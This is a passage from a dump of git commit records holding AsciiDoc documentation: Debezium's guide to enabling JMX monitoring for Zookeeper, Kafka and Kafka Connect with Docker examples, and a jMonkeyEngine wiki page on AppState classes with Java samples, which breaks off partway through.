JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\nThe following example Docker command start a container using the `debezium\/connect` image with values for the `JMXPORT` and `HOST_NAME` environment variables, and maps the Docker host's port 9012 to the container's JMX port:\n\nThe Docker command to start a container using the `debezium\/connect` image defines these variables using Docker's standard `-e` parameter, and maps the JMX port to a port on the Docker host. For example, the following command starts a container with JMX exposed on port 9011:\n\n```\ndocker run -it --rm --name connect -p 8083:8083 -p 9012:9012 -e JMXPORT=9012 -e JMXHOST=10.0.1.10 -e GROUP_ID=1 -e CONFIG_STORAGE_TOPIC=my_connect_configs -e OFFSET_STORAGE_TOPIC=my_connect_offsets --link zookeeper:zookeeper --link kafka:kafka --link mysql:mysql debezium\/connect:latest\n```\n\n== Prometheus and Grafana\n\nThe metrics exposed by Debezium and Apache Kafka are often exported and displayed via https:\/\/prometheus.io\/[Prometheus] and https:\/\/grafana.com\/[Grafana].\nYou can find an example for the required configuration and example dashboards for different connectors in the https:\/\/github.com\/debezium\/debezium-examples\/tree\/master\/monitoring[Debezium examples repository].\nNote these dashboards are not part of Debezium itself and are maintained on a best-effort basis.\n\n","old_contents":"= Monitoring Debezium\ninclude::..\/_attributes.adoc[]\n:linkattrs:\n:icons: font\n:toc:\n:toc-placement: macro\n\ntoc::[]\n\nDebezium uses Kafka and Zookeeper, and all of these support monitoring via JMX. In fact, there are a lot of https:\/\/zookeeper.apache.org\/doc\/r3.1.2\/zookeeperJMX.html[Zookeeper metrics] and even more http:\/\/docs.confluent.io\/3.0.0\/kafka\/monitoring.html[Kafka metrics] available. But how JMX is enabled in these services depends on whether you're running them in Docker containers or using the standard installations.\n\n[NOTE]\n====\nIf you are running multiple services on the same machine, be sure to use distinct JMX ports for each service.\n====\n\n\n== Local installations\n\nJMX can be enabled in Zookeeper, Kafka, and Kafka Connect using their standard installations and environment variables when running the startup commands.\n\n=== Local Zookeeper\n\nZookeeper has built-in support for JMX. When running Zookeeper using a local installation, the `zkServer.sh` script recognizes the following environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMXPORT`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\n=== Local Kafka\n\nWhen running Kafka using a local installation, the `kafka-server-start.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n=== Local Kafka Connect\n\nWhen running Kafka using a local installation, the `connect-distributed.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n== Using Docker\n\nEnable JMX for a JVM running in a Docker container requires several additional options not normally needed when running on a local machine. This is because the JVM requires the hostname to which it will advertise itself to JMX clients. Because of this, Debezium's Docker images for Zookeeper, Kafka, and Kafka Connect use several environment variables to enable and configure JMX. Most of the environment variables are the same for all of the images, but there are some minor differences.\n\n=== Zookeeper in Docker\n\nThe `debezium\/zookeeper` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\nThe following example Docker command start a container using the `debezium\/zookeeper` image with values for the `JMXPORT` and `JMXHOST` environment variables, and maps the Docker host's port 9010 to the container's JMX port:\n\n```\ndocker run -it --rm --name zookeeper -p 2181:2181 -p 2888:2888 -p 3888:3888 -p 9010:9010 -e JMXPORT=9010 -e JMXHOST=10.0.1.10 debezium\/zookeeper:latest\n```\n\n=== Kafka in Docker\n\nThe `debezium\/kafka` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\n\nThe following example Docker command start a container using the `debezium\/kafka` image with values for the `JMXPORT` and `HOST_NAME` environment variables, and maps the Docker host's port 9011 to the container's JMX port:\n\n```\ndocker run -it --rm --name kafka -p 9092:9092 -p 9011:9011 -e JMXPORT=9011 -e JMXHOST=10.0.1.10 --link zookeeper:zookeeper debezium\/kafka:latest\n```\n\n== Kafka Connect in Docker\n\nThe `debezium\/connect` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\nThe following example Docker command start a container using the `debezium\/connect` image with values for the `JMXPORT` and `HOST_NAME` environment variables, and maps the Docker host's port 9012 to the container's JMX port:\n\nThe Docker command to start a container using the `debezium\/connect` image defines these variables using Docker's standard `-e` parameter, and maps the JMX port to a port on the Docker host. For example, the following command starts a container with JMX exposed on port 9011:\n\n```\ndocker run -it --rm --name connect -p 8083:8083 -p 9012:9012 -e JMXPORT=9012 -e JMXHOST=10.0.1.10 -e GROUP_ID=1 -e CONFIG_STORAGE_TOPIC=my_connect_configs -e OFFSET_STORAGE_TOPIC=my_connect_offsets --link zookeeper:zookeeper --link kafka:kafka --link mysql:mysql debezium\/connect:latest\n```\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ff0e7839ab2d05874b8fa38b49b6834e1cfa692","subject":"attribute test.","message":"attribute test.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/application_states.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/application_states.adoc","new_contents":"= Application States\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nThe `com.jme3.app.state.AppState` class is a customizable jME3 interface that allows you to control the global game logic, the overall game mechanics. (To control the behaviour of a Spatial, see <<jme3\/advanced\/custom_controls#,Custom Controls>> instead. Controls and AppStates can be used together.)\n\n\n== Overview\n\n\n=== Use Case Examples\n\nThere are situations during your game development where you think:\n\n* Mouse and key inputs are handled differently in-game versus in the main menu. Can I group a set of input handler settings, and activate and deactivate them all in one step?\n* I have the in-game scene, and a character editor, and a Captain's Quarters screen. Can I group a set of nodes and behaviours, and swap them in and out in one step?\n* When I pause the game, I want the character's \"`idle`\" animation to continue, but all other loops and game events should stop. How do I define what happens when the game is paused\/unpaused?\n* I have a conditional block that takes up a lot of space in my simpleUpdate() loop. Can I wrap up this block of code, and switch it on and off in one step?\n* Can I package everything that belongs in-game, and everything that belongs to the menu screen, and switch between these two \"`big`\" states in one step?\n\nYou can! This is what AppStates are there for. An AppState class is subset of (or an extension to) your application. Every AppState class has access to all fields in your main application (AssetManager, ViewPort, StateManager, InputManager, RootNode, GuiNode, etc) and hooks into the main update loop. An AppState can contain:\n\n* a subset of class fields, functions, methods (game state data and accessors),\n* a subset of +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ elements and their listeners,\n* a subset of input handlers and mappings,\n* a subset of nodes that you load and attach to the rootNode,\n* a subset of conditional actions that you branch to in the simpleUpdate() loop,\n* a subset of other AppStates and Controls\n* \u2026 or combinations thereof.\n\n\n=== Supported Features\n\nEach AppState lets you define what happens to it in the following situations:\n\n* *The AppState is initialized:* You load and initialize game data, InputHandlers, AppStates and Controls and attach nodes. +\nThe AppState executes its own simpleInitApp() method when it is attached, so to speak.\n* *The AppState has been enabled (unpaused):* This toggles a boolean isEnabled() to true. Here you attach nodes and listeners that should become active while it's running.\n* *While the AppState is running\/paused:* You can poll isEnabled() to define paused and unpaused game behaviour in the update() loop. In update(), you poll and modify the game state, modify the scene graph, and trigger events. Test if `!isEnabled()`, and write code that skips the running sections of this AppState's `update()` loop. +\nEach AppState has its own update loop, which hooks into the main simpleUpdate() loop (callback).\n* *The AppState has been disabled (paused):* This toggles a boolean isEnabled() to false. Here you switch all objects to their specific \"`paused`\" behaviour.\n* *The AppState is cleaned up:* Here you decide what happens when the AppState is detached. Save this AppState's game state, unregister Controls and InputHandlers, detach related AppStates, detach nodes from the rootNode, etc.\n\n\n[TIP]\n====\nAppStates are extremely handy to swap out, or pause\/unpause whole sets of other AppStates. For example, an InGameState (loads in-game +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, activates click-to-shoot input mappings, inits game content, starts game loop) versus MainScreenState (stops game loop, saves and detaches game content, switches to menu screen +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, switches to click-to-select input mappings).\n====\n\n\n\n=== Usage\n\nTo implement game logic:\n\n. Create one AbstractAppState instance for each set of game mechanics.\n. Implement game behaviour in the AppState's update() method.\n** You can pass custom data as arguments in the constructor.\n** The AppState has access to everything inside the app's scope via the Application `app` object.\n\n. Create and attach the AppState to the AppStateManager (`stateManager.attach(myAppState);`) and initialize it.\n. Enable and disable (unpause and pause) the AppStates that you need during the game.\n. Detach the AppState from the AppStateManager (`stateManager.detach(myAppState);`) and clean it up.\n\nWhen you add several AppStates to one Application and activate them, their initialize() methods and update() loops are executed in the order in which the AppStates were added to the AppStateManager.\n\n\n=== Code Samples\n\nJME3 comes with a BulletAppState that implements Physical behaviour (using the jBullet library). You, for example, could write an Artificial Intelligence AppState to control all your enemy units. Existing examples in the code base include:\n\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-bullet\/src\/common\/java\/com\/jme3\/bullet\/BulletAppState.java[BulletAppState] controls physical behaviour in PhysicsControl'ed Spatials.\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/TestAppStates.java[TestAppStates.java] an example of a custom AppState\n** link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/RootNodeState.java[RootNodeState.java]\n\n\n\n== AppState\n\nThe AppState interface lets you initialize sets of objects, and hook a set of continuously executing code into the main loop.\n[cols=\"25,75\", options=\"header\"]\n|===\n\na|AppState Method\na|Usage\n\na|initialize(asm,app)\na|When this AppState is added to the game, the RenderThread initializes the AppState and then calls this method. You can modify the scene graph from here (e.g. attach nodes). To get access to the main app, call:\n[source,java]\n----\nsuper.initialize(stateManager, app);\nthis.app = (SimpleApplication) app;\n----\n\n\na|cleanup()\na|This method is executed after you remove the AppState from the game. Here you implement clean-up code for when this state is detached. You can modify the scene graph from here (e.g. detach nodes).\n\na|update(float tpf)\na|Here you implement the behaviour that you want to hook into the simpleUpdate() loop while this state is attached to the game. You can modify the scene graph from here.\n\na|isInitialized()\na|Your implementations of this interface should return the correct respective boolean value. (See AbstractAppState)\n\na|setEnabled(true) +\nsetEnabled(false)\na|Temporarily enables or disables an AppState. (See AbstractAppState)\n\na|isEnabled()\na|Test whether AppState is enabled or disabled. Your implementation should consider the boolean. (See AbstractAppState)\n\na|stateAttached(asm) +\nstateDetached(asm)\na|The AppState knows when it is attached to, or detached from, the AppStateManager, and triggers these two methods. Don't modify the scene graph from here! (Typically not used.)\n\na|render(RenderManager rm)\na|Renders the state, plus your optional customizations. (Typically not used.)\n\na|postRender()\na|Called after all rendering commands are flushed, including your optional customizations. (Typically not used.)\n\n|===\n\n\n== AbstractAppState\n\nThe link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-core\/src\/main\/java\/com\/jme3\/app\/state\/AbstractAppState.java[AbstractAppState] class already implements some common methods (`isInitialized(), setEnabled(), isEnabled()`) and makes creation of custom AppStates a bit easier. We recommend you extend AbstractAppState and override the remaining AppState methods: `initialize(), setEnabled(), cleanup()`.\n\nDefinition:\n\n[source,java]\n----\npublic class MyAppState extends AbstractAppState {\n\n private SimpleApplication app;\n\n private Node x = new Node(\"x\"); \/\/ some custom class fields...\n public Node getX(){ return x; } \/\/ some custom methods...\n\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication)app; \/\/ cast to a more specific class\n\n \/\/ init stuff that is independent of whether state is PAUSED or RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomething(); \/\/ call custom methods...\n }\n\n @Override\n public void cleanup() {\n super.cleanup();\n \/\/ unregister all my listeners, detach all my nodes, etc...\n this.app.getRootNode().detachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n \/\/ Pause and unpause\n super.setEnabled(enabled);\n if(enabled){\n \/\/ init stuff that is in use while this state is RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n } else {\n \/\/ take away everything not needed while this state is PAUSED\n ...\n }\n }\n\n \/\/ Note that update is only called while the state is both attached and enabled.\n @Override\n public void update(float tpf) {\n \/\/ do the following while game is RUNNING\n this.app.getRootNode().getChild(\"blah\").scale(tpf); \/\/ modify scene graph...\n x.setUserData(...); \/\/ call some methods...\n }\n\n}\n----\n\n\n== BaseAppState\nhttps:\/\/javadoc.jmonkeyengine.org\/v3.3.0-beta1\/index.html?com\/jme3\/app\/state\/BaseAppState.html\n\nA new link:{link-javadoc}\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] class was introduced as part of the link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-3-1-alpha-4-released\/35478[updates] being made to the AppState interface. AbstractAppState is the most minimal of the minimal implementations of the AppState interface. You essentially still need to do everything yourself, including getting the funky enable\/disable\/initialized\/terminate logic right. Now you just extend BaseAppState and you get onEnable() and onDisable() already worked out for you.\n\nDefinition:\n\n[source,java]\n----\npublic class MyBaseAppState extends BaseAppState {\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void initialize(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/It is technically safe to do all initialization and cleanup in the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/onEnable()\/onDisable() methods. Choosing to use initialize() and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleanup() for this is a matter of performance specifics for the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/implementor.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: initialize your AppState, e.g. attach spatials to rootNode\u00a0\u00a0\u00a0\n }\n\n @Override\u00a0\u00a0\u00a0\n protected void cleanup(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: clean up what you initialized in the initialize method,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/e.g. remove all spatials from rootNode\u00a0\u00a0\u00a0\n }\n\n \u00a0 \/\/onEnable()\/onDisable() can be used for managing things that should \u00a0\u00a0\u00a0\n \/\/only exist while the state is enabled. Prime examples would be scene \u00a0\u00a0\u00a0\n \/\/graph attachment or input listener attachment.\u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void onEnable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state is fully enabled, ie: is attached and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/isEnabled() is true or when the setEnabled() status changes after the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/state is attached.\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n \u00a0 @Override\u00a0\u00a0\u00a0\n protected void onDisable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state was previously enabled but is now disabled \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/either because setEnabled(false) was called or the state is being \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleaned up.\u00a0\u00a0\u00a0\n }\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n\n @Override\u00a0\u00a0\u00a0\n public void update(float tpf) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: implement behavior during runtime\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n}\n----\n\nNotable BaseAppState changes are as follows:\n\n\n* You no longer need to call super.initialize(stateManager, app) because it is now called by BaseAppState upon initialization for you.\n* You no longer have to cast SimpleApplication to have access to AssetManager, AppStateManager, and you can even get a State directly. The getters getApplication(), getAssetManager(), getState(type) and their methods are available to you immediately. However, you still have to cast SimpleApplication to get rootNode.\n* You no longer call super during cleanup, its done for you now.\n* It's now safe to do all initialization and cleanup in the onEnable()\/onDisable() methods.\n* Cleanup and setEnabled now have logging built in.\n\nYou use BaseAppState as you would AbstractAppState, other than mentioned above, and which one you use is entirely up to you. However, BaseAppState makes your life easier and is the recommended one to use now.\n\nSee link:http:\/\/javadoc.jmonkeyengine.org\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] for more information.\n\n== Pausing and Unpausing\n\nYou define what an AppState does when Paused or Unpaused, in the `setEnabled()` and `update()` methods. Call `myState.setEnabled(false)` on all states that you want to pause. Call `myState.setEnabled(true)` on all states that you want to unpause.\n\n\n== AppStateManager\n\nThe com.jme3.app.state.AppStateManager holds the list of AppStates for an application. AppStateManager ensures that active AppStates can modify the scene graph, and that the update() loops of active AppStates is executed. There is one AppStateManager per application. You typically attach several AppStates to one AppStateManager, but the same state can only be attached once.\n[cols=\"2\", options=\"header\"]\n|===\n\na|AppStateManager Method\na|Usage\n\na|hasState(myState)\na|Is AppState object 'myState' attached?\n\na|getState(MyAppState.class)\na|Returns the first attached state that is an instance of a subclass of `MyAppState.class`.\n\n|===\n\nThe AppStateManager's `render(), postRender(), cleanup()` methods are internal, ignore them, users never call them directly.\n\n* If a detached AppState is attached then initialize() will be called on the following render pass.\n* If an attached AppState is detached then cleanup() will be called on the following render pass.\n* If you attach an already-attached AppState then the second attach is a no-op and will return false.\n* If you both attach and detach an AppState within one frame then neither initialize() or cleanup() will be called, although if either is called both will be.\n* If you both detach and then re-attach an AppState within one frame then on the next update pass its cleanup() and initialize() methods will be called in that order.\n\n\n== Best Practices\n\n\n=== Communication Among AppStates\n\nYou can only access other AppStates (read from and write to them) from certain places: From a Control's update() method, from an AppState's update() method, and from the SimpleApplication's simpleUpdate() loop. Don't mess with the AppState from other places, because from other methods you have no control over the order of modifications; the game can go out of sync because you can't know when (during which half-finished step of another state change) your modification will be performed.\n\nYou can use custom accessors to get data from AppStates, to set data in AppStates, or to trigger methods in AppStates.\n\n[source,java]\n----\nthis.app.getStateManager().getState(MyAppState.class).doSomeCustomStuffInThisState();\n----\n\n\n=== Initialize Familiar Class Fields\n\nTo access class fields of the SimpleApplication the way you are used to, initialize them to local variables, as shown in the following AppState template:\n\n[source,java]\n----\n\nprivate SimpleApplication app;\nprivate Node rootNode;\nprivate AssetManager assetManager;\nprivate AppStateManager stateManager;\nprivate InputManager inputManager;\nprivate ViewPort viewPort;\nprivate BulletAppState physics;\n\npublic class MyAppState extends AbstractAppState {\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication) app; \/\/ can cast Application to something more specific\n this.rootNode = this.app.getRootNode();\n this.assetManager = this.app.getAssetManager();\n this.stateManager = this.app.getStateManager();\n this.inputManager = this.app.getInputManager();\n this.viewPort = this.app.getViewPort();\n this.physics = this.stateManager.getState(BulletAppState.class);\n }\n}\n\n----\n","old_contents":"= Application States\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nThe `com.jme3.app.state.AppState` class is a customizable jME3 interface that allows you to control the global game logic, the overall game mechanics. (To control the behaviour of a Spatial, see <<jme3\/advanced\/custom_controls#,Custom Controls>> instead. Controls and AppStates can be used together.)\n\n\n== Overview\n\n\n=== Use Case Examples\n\nThere are situations during your game development where you think:\n\n* Mouse and key inputs are handled differently in-game versus in the main menu. Can I group a set of input handler settings, and activate and deactivate them all in one step?\n* I have the in-game scene, and a character editor, and a Captain's Quarters screen. Can I group a set of nodes and behaviours, and swap them in and out in one step?\n* When I pause the game, I want the character's \"`idle`\" animation to continue, but all other loops and game events should stop. How do I define what happens when the game is paused\/unpaused?\n* I have a conditional block that takes up a lot of space in my simpleUpdate() loop. Can I wrap up this block of code, and switch it on and off in one step?\n* Can I package everything that belongs in-game, and everything that belongs to the menu screen, and switch between these two \"`big`\" states in one step?\n\nYou can! This is what AppStates are there for. An AppState class is subset of (or an extension to) your application. Every AppState class has access to all fields in your main application (AssetManager, ViewPort, StateManager, InputManager, RootNode, GuiNode, etc) and hooks into the main update loop. An AppState can contain:\n\n* a subset of class fields, functions, methods (game state data and accessors),\n* a subset of +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ elements and their listeners,\n* a subset of input handlers and mappings,\n* a subset of nodes that you load and attach to the rootNode,\n* a subset of conditional actions that you branch to in the simpleUpdate() loop,\n* a subset of other AppStates and Controls\n* \u2026 or combinations thereof.\n\n\n=== Supported Features\n\nEach AppState lets you define what happens to it in the following situations:\n\n* *The AppState is initialized:* You load and initialize game data, InputHandlers, AppStates and Controls and attach nodes. +\nThe AppState executes its own simpleInitApp() method when it is attached, so to speak.\n* *The AppState has been enabled (unpaused):* This toggles a boolean isEnabled() to true. Here you attach nodes and listeners that should become active while it's running.\n* *While the AppState is running\/paused:* You can poll isEnabled() to define paused and unpaused game behaviour in the update() loop. In update(), you poll and modify the game state, modify the scene graph, and trigger events. Test if `!isEnabled()`, and write code that skips the running sections of this AppState's `update()` loop. +\nEach AppState has its own update loop, which hooks into the main simpleUpdate() loop (callback).\n* *The AppState has been disabled (paused):* This toggles a boolean isEnabled() to false. Here you switch all objects to their specific \"`paused`\" behaviour.\n* *The AppState is cleaned up:* Here you decide what happens when the AppState is detached. Save this AppState's game state, unregister Controls and InputHandlers, detach related AppStates, detach nodes from the rootNode, etc.\n\n\n[TIP]\n====\nAppStates are extremely handy to swap out, or pause\/unpause whole sets of other AppStates. For example, an InGameState (loads in-game +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, activates click-to-shoot input mappings, inits game content, starts game loop) versus MainScreenState (stops game loop, saves and detaches game content, switches to menu screen +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, switches to click-to-select input mappings).\n====\n\n\n\n=== Usage\n\nTo implement game logic:\n\n. Create one AbstractAppState instance for each set of game mechanics.\n. Implement game behaviour in the AppState's update() method.\n** You can pass custom data as arguments in the constructor.\n** The AppState has access to everything inside the app's scope via the Application `app` object.\n\n. Create and attach the AppState to the AppStateManager (`stateManager.attach(myAppState);`) and initialize it.\n. Enable and disable (unpause and pause) the AppStates that you need during the game.\n. Detach the AppState from the AppStateManager (`stateManager.detach(myAppState);`) and clean it up.\n\nWhen you add several AppStates to one Application and activate them, their initialize() methods and update() loops are executed in the order in which the AppStates were added to the AppStateManager.\n\n\n=== Code Samples\n\nJME3 comes with a BulletAppState that implements Physical behaviour (using the jBullet library). You, for example, could write an Artificial Intelligence AppState to control all your enemy units. Existing examples in the code base include:\n\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-bullet\/src\/common\/java\/com\/jme3\/bullet\/BulletAppState.java[BulletAppState] controls physical behaviour in PhysicsControl'ed Spatials.\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/TestAppStates.java[TestAppStates.java] an example of a custom AppState\n** link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/RootNodeState.java[RootNodeState.java]\n\n\n\n== AppState\n\nThe AppState interface lets you initialize sets of objects, and hook a set of continuously executing code into the main loop.\n[cols=\"25,75\", options=\"header\"]\n|===\n\na|AppState Method\na|Usage\n\na|initialize(asm,app)\na|When this AppState is added to the game, the RenderThread initializes the AppState and then calls this method. You can modify the scene graph from here (e.g. attach nodes). To get access to the main app, call:\n[source,java]\n----\nsuper.initialize(stateManager, app);\nthis.app = (SimpleApplication) app;\n----\n\n\na|cleanup()\na|This method is executed after you remove the AppState from the game. Here you implement clean-up code for when this state is detached. You can modify the scene graph from here (e.g. detach nodes).\n\na|update(float tpf)\na|Here you implement the behaviour that you want to hook into the simpleUpdate() loop while this state is attached to the game. You can modify the scene graph from here.\n\na|isInitialized()\na|Your implementations of this interface should return the correct respective boolean value. (See AbstractAppState)\n\na|setEnabled(true) +\nsetEnabled(false)\na|Temporarily enables or disables an AppState. (See 